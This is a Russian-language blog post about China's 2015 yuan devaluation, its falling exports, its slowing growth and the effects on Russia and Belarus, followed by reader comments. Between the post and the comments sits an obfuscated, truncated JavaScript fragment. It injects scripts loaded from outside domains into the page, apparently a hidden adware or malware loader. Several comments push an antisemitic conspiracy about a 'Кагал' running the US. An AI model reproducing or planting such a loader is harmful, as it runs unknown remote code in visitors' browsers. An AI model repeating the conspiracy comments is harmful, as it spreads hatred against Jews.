Развитиие китайского фондового кризиса - девальвация юаня
КПК внезапно девальвировал юань
Китайский валютный регулятор объявил о снижении курса юаня на максимальную за два десятилетия величину, сообщило агентствоBloomberg. Ежедневно устанавливаемый справочный курс снижен на рекордные 1,9%, вызвав самый резкий обвал юаня с января 1994 года

Народный банк Китая назвал сегодняшнее изменение ориентира "единоразовой коррекцией", пообещав впредь поддерживать стабильный курс на "разумном" уровне и укреплять роль рыночных факторов в его определении.
Эксперты агентства считают, что эта мера направлена на поддержку экспортеров. Ранее опубликованные данные показали, что экспорт Китая в июле рухнул на 8,3% из-за низкого спроса трех крупнейших торговых партнеров страны - Евросоюза, США и Японии.
С начала года Китай снизил экспорт в страны ЕС на 2,5%, в Японию - на 10,5%. При этом продажи товаров и услуг в США увеличились на 9,3%.
Импорт в КНР сократился на 8,1%. Внешнеторговый дефицит в прошедшем месяце составил 43 млрд долларов.
Ранее в понедельник стало известно, что, по данным официальной статистики, инфляция в Китае в июле ускорилась с 1,4% до 1,6% в годовом выражении.

Много старперов и младперов в ГП не понимает главного - что бы юань стал мировой валютой, он должен быть свободно конвертируем в мире. Сама КПК боится открытости. Никто этому не мешает
Рост ВВП Китая во втором квартале составил 7% в годовом выражении. Это чуть выше, чем предсказывали эксперты. Такой же рост ВВП Китай показывал и в первом квартале, однако это все равно наиболее слабый показатель после кризиса 2009 года, когда рост китайской экономики замедлился до 6,5%.
Власти Китая стараются превратить в двигатель роста экономики развитие внутреннего рынка и секторов "новой экономики", включая технологии, современные виды промышленного оборудования (робототехнику), транспорта, производства электроэнергии. Но на эти секторы приходится лишь 15% совокупной выручки производственной отрасли, и они не могут компенсировать замедления в традиционных секторах промышленности, хотя и растут быстрее них.
Если и дальше рост китайской экономики будет замедляться, то это приведет к падению темпов роста мировой экономики на 2%. Уже сейчас замедление экономики Китая негативно сказывается на экономике других стран.
Косвенно проблемы китайской экономики могут оказать влияние и на Россию, негативно повлияв на мировые цены на нефть. КНР является вторым в мире после США потребителем ресурса, и последние годы рост мирового спроса на нефть обеспечивался главным образом за счет растущих потребностей Китая.
Кроме того, затягивается реализация договора по газопроводу "Сила Сибири-2" из-за того, что в Китае снизилось потребление газа.

Рост товарооборота России с Китаем - хорошо. Однако важна структура и динамика собственного экспорта, а не рост китайского экспорта в Россию. Это же касается и Беларуси
Уже четыре года Китай для России является первым торговым партнером по товарообороту; в прошлом году его объем превысил 90 млрд долларов. Россия в рейтинге торговых партнеров Пекина заняла в 2014 году девятое место. Однако в первом квартале этого года, по данным Федеральной таможенной службы России, товарооборот между странами снизился на 29% по сравнению с аналогичным периодом прошлого года, а объем прямых инвестиций Китая в экономику России в первом полугодии 2015 года сократился на 25%. .
-----------
Н.П. Сама девальвация в 2 % вызовет у белорусов и россиян смех - у нас оперируют десятками процентов. Но для управляемой и зарегулированной валютной политики Китая это немало - он решил увеличить внешний спрос за счет внутреннего.
Потребителям китайского станет лучше (дешевле), а экспортерам в Китай - наоборот. Но главный вывод - зарегулированный госкапитализм Китая столкнулся с традиционным капкризисом и должен будет сделать коррекцию или к рынку, или к госрегулированию.
<script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>
Комментарии
Просто этих бабушек слишком много.
Только вы, Валерий, не стройте иллюзий, что в Китае коммуняки бабушек любят. Вы ведь знаете, что там нет госпенсий
Всем управляет США.
А США управляет какой-то Кагал.
Так, гуманитарий ?
Я бы тебе порекомендовал например начать читать ликбез. Но боюсь тебе как верному адепту Мамерики это покажется страшным и кощунственным предложением.
Начать можно было бы с книги Буровског - „Евреи которых небыло“ - хотя если сам Мамерике не скажешь - он не узнает!
Но Китай - особенный парень. Если у него рост ВВП снизится до 4 %, то это равнозначно нулю. Может статистика привирает, или что-то другое.